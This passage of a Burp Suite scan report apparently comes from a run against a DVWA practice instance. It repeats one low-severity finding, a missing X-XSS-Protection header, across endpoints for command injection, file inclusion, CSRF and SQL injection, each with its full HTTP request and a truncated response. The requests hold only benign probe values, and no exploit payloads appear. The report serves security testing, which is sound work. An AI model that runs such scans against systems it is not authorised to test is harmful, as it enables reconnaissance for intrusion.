Date: Mon, 21 Oct 2024 09:38:25 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 82847
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<style type="text/css">
body {background-color: #fff; co
...[SNIP]...
16.32. https://pentest-ground.com:4280/robots.txt
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/robots.txt |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
No X-XSS-Protection header was set in the response. This means that the browser uses default behavior that detection of a cross-site scripting attack never prevents rendering.
Remediation detail
The following header should be set:
X-XSS-Protection: 1; mode=block
Request 1
GET /robots.txt HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:35:16 GMT
Content-Type: text/plain
Content-Length: 25
Connection: close
Last-Modified: Tue, 21 Nov 2023 11:18:49 GMT
ETag: "19-60aa7c44ae30b"
Accept-Ranges: bytes
User-agent: *
Disallow: /
16.33. https://pentest-ground.com:4280/security.php
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/security.php |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
No X-XSS-Protection header was set in the response. This means that the browser uses default behavior that detection of a cross-site scripting attack never prevents rendering.
Remediation detail
The following header should be set:
X-XSS-Protection: 1; mode=block
Request 1
POST /security.php HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=20f82cc3bfe2f59fa9f8dc5eaf0d9132
Origin: https://pentest-ground.com:4280
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/security.php
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 80
security=medium&seclev_submit=Submit&user_token=7878af9d1f476a29debc53d941ab743b
Response 1
HTTP/1.1 302 Found
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:37:38 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: security=medium; path=/
Location: /security.php
16.34. https://pentest-ground.com:4280/setup.php
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/setup.php |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
No X-XSS-Protection header was set in the response. This means that the browser uses default behavior that detection of a cross-site scripting attack never prevents rendering.
Remediation detail
The following header should be set:
X-XSS-Protection: 1; mode=block
Request 1
POST /setup.php HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=3e13af75256398bc637d5d0dd777847d
Origin: https://pentest-ground.com:4280
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/setup.php
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 79
create_db=Create+%2F+Reset+Database&user_token=ea82f69bc052fad0104ed7120d273e2e
Response 1
HTTP/1.1 302 Found
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:36:03 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: /setup.php
16.35. https://pentest-ground.com:4280/vulnerabilities/brute/
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/brute/ |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
No X-XSS-Protection header was set in the response. This means that the browser uses default behavior that detection of a cross-site scripting attack never prevents rendering.
Remediation detail
The following header should be set:
X-XSS-Protection: 1; mode=block
Request 1
GET /vulnerabilities/brute/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=677b9b581720fa14a254ac46290cf902
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:35:21 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4153
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: Brute Force :: Damn Vulnerable Web Application (DVWA)</ti
...[SNIP]...
16.36. https://pentest-ground.com:4280/vulnerabilities/captcha/
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/captcha/ |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
No X-XSS-Protection header was set in the response. This means that the browser uses default behavior that detection of a cross-site scripting attack never prevents rendering.
Remediation detail
The following header should be set:
X-XSS-Protection: 1; mode=block
Request 1
GET /vulnerabilities/captcha/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=6673dce764fbffe20cb502b85dd01724
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:35:25 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4701
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: Insecure CAPTCHA :: Damn Vulnerable Web Application (DVWA
...[SNIP]...
16.37. https://pentest-ground.com:4280/vulnerabilities/csp/
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/csp/ |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
No X-XSS-Protection header was set in the response. This means that the browser uses default behavior that detection of a cross-site scripting attack never prevents rendering.
Remediation detail
The following header should be set:
X-XSS-Protection: 1; mode=block
Request 1
POST /vulnerabilities/csp/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=cb699b2b01793adc893b18f04186aba0
Origin: https://pentest-ground.com:4280
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/csp/
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 14
include=WvEMlU
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:36:25 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4164
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Security-Policy: script-src 'self' https://pastebin.com hastebin.com www.toptal.com example.com code.jquery.com https://ssl.google-analytics.com ;
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: Content Security Policy (CSP) Bypass :: Damn Vulnerable W
...[SNIP]...
16.38. https://pentest-ground.com:4280/vulnerabilities/csp/WvEMlU
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/csp/WvEMlU |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
No X-XSS-Protection header was set in the response. This means that the browser uses default behavior that detection of a cross-site scripting attack never prevents rendering.
Remediation detail
The following header should be set:
X-XSS-Protection: 1; mode=block
Request 1
GET /vulnerabilities/csp/WvEMlU HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=cb699b2b01793adc893b18f04186aba0
Referer: https://pentest-ground.com:4280/vulnerabilities/csp/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 404 Not Found
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:36:25 GMT
Content-Type: text/html; charset=iso-8859-1
Content-Length: 280
Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apach
...[SNIP]...
16.39. https://pentest-ground.com:4280/vulnerabilities/csrf/
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/csrf/ |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
No X-XSS-Protection header was set in the response. This means that the browser uses default behavior that detection of a cross-site scripting attack never prevents rendering.
Remediation detail
The following header should be set:
X-XSS-Protection: 1; mode=block
Request 1
GET /vulnerabilities/csrf/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=4af5ee61eab28a6dbbe1ce917fe25f23
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:35:23 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 5359
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: Cross Site Request Forgery (CSRF) :: Damn Vulnerable Web
...[SNIP]...
16.40. https://pentest-ground.com:4280/vulnerabilities/csrf/test_credentials.php
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/csrf/test_credentials.php |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
No X-XSS-Protection header was set in the response. This means that the browser uses default behavior that detection of a cross-site scripting attack never prevents rendering.
Remediation detail
The following header should be set:
X-XSS-Protection: 1; mode=block
Request 1
POST /vulnerabilities/csrf/test_credentials.php HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=70f6e6956d00d19077d4d7074dd5552e
Origin: https://pentest-ground.com:4280
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/csrf/test_credentials.php
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 31
username=&password=&Login=Login
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:38:37 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 1079
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Damn Vulnerable Web Application (DVWA)Test Credentials</title>
<link
...[SNIP]...
16.41. https://pentest-ground.com:4280/vulnerabilities/exec/
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/exec/ |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
No X-XSS-Protection header was set in the response. This means that the browser uses default behavior that detection of a cross-site scripting attack never prevents rendering.
Remediation detail
The following header should be set:
X-XSS-Protection: 1; mode=block
Request 1
POST /vulnerabilities/exec/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=d0ba91771b783950c31dcfd0b174fbb8
Origin: https://pentest-ground.com:4280
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/exec/
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 23
ip=CcwtLI&Submit=Submit
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:36:05 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4104
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: Command Injection :: Damn Vulnerable Web Application (DVW
...[SNIP]...
16.42. https://pentest-ground.com:4280/vulnerabilities/fi/
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/fi/ |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
No X-XSS-Protection header was set in the response. This means that the browser uses default behavior that detection of a cross-site scripting attack never prevents rendering.
Remediation detail
The following header should be set:
X-XSS-Protection: 1; mode=block
Request 1
GET /vulnerabilities/fi/?page=file1.php HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=143c86fc083ce7d7f684f49dfdbc3c28
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/fi/?page=include.php
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:36:08 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4094
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: File Inclusion :: Damn Vulnerable Web Application (DVWA)<
...[SNIP]...
16.43. https://pentest-ground.com:4280/vulnerabilities/javascript/
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/javascript/ |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
No X-XSS-Protection header was set in the response. This means that the browser uses default behavior that detection of a cross-site scripting attack never prevents rendering.
Remediation detail
The following header should be set:
X-XSS-Protection: 1; mode=block
Request 1
POST /vulnerabilities/javascript/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=047d8dd2ace9aaf1d3f54dd1c349de44
Origin: https://pentest-ground.com:4280
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/javascript/
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 66
token=8b479aefbd90795395b3e7089ae0dc09&phrase=ChangeMe&send=Submit
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:37:36 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 8321
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: JavaScript Attacks :: Damn Vulnerable Web Application (DV
...[SNIP]...
16.44. https://pentest-ground.com:4280/vulnerabilities/open_redirect/
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/open_redirect/ |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
No X-XSS-Protection header was set in the response. This means that the browser uses default behavior that detection of a cross-site scripting attack never prevents rendering.
Remediation detail
The following header should be set:
X-XSS-Protection: 1; mode=block
Request 1
GET /vulnerabilities/open_redirect/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=f95de080a06d37780795c31df4383fd6
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:35:34 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4241
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: Open HTTP Redirect :: Damn Vulnerable Web Application (DV
...[SNIP]...
16.45. https://pentest-ground.com:4280/vulnerabilities/open_redirect/source/info.php
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/open_redirect/source/info.php |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
No X-XSS-Protection header was set in the response. This means that the browser uses default behavior that detection of a cross-site scripting attack never prevents rendering.
Remediation detail
The following header should be set:
X-XSS-Protection: 1; mode=block
Request 1
GET /vulnerabilities/open_redirect/source/info.php?id=2 HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=4211f230e7d91901f7f1c3880dd3aa6f
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/open_redirect/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:36:28 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4193
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: Open HTTP Redirect :: Damn Vulnerable Web Application (DV
...[SNIP]...
16.46. https://pentest-ground.com:4280/vulnerabilities/open_redirect/source/low.php
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/open_redirect/source/low.php |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
No X-XSS-Protection header was set in the response. This means that the browser uses default behavior that detection of a cross-site scripting attack never prevents rendering.
Remediation detail
The following header should be set:
X-XSS-Protection: 1; mode=block
Request 1
GET /vulnerabilities/open_redirect/source/low.php?redirect=info.php?id=1 HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=f24117d4e4d0b8e33bc943d70bd65e00
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/open_redirect/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 302 Found
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:36:26 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
X-Powered-By: PHP/8.3.12
location: info.php?id=1
16.47. https://pentest-ground.com:4280/vulnerabilities/sqli/
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/sqli/ |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
No X-XSS-Protection header was set in the response. This means that the browser uses default behavior that detection of a cross-site scripting attack never prevents rendering.
Remediation detail
The following header should be set:
X-XSS-Protection: 1; mode=block
Request 1
GET /vulnerabilities/sqli/?id=946146&Submit=Submit HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=e7fce7ed667134b8606e163d4a2a33b7
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/sqli/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:37:30 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4064
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
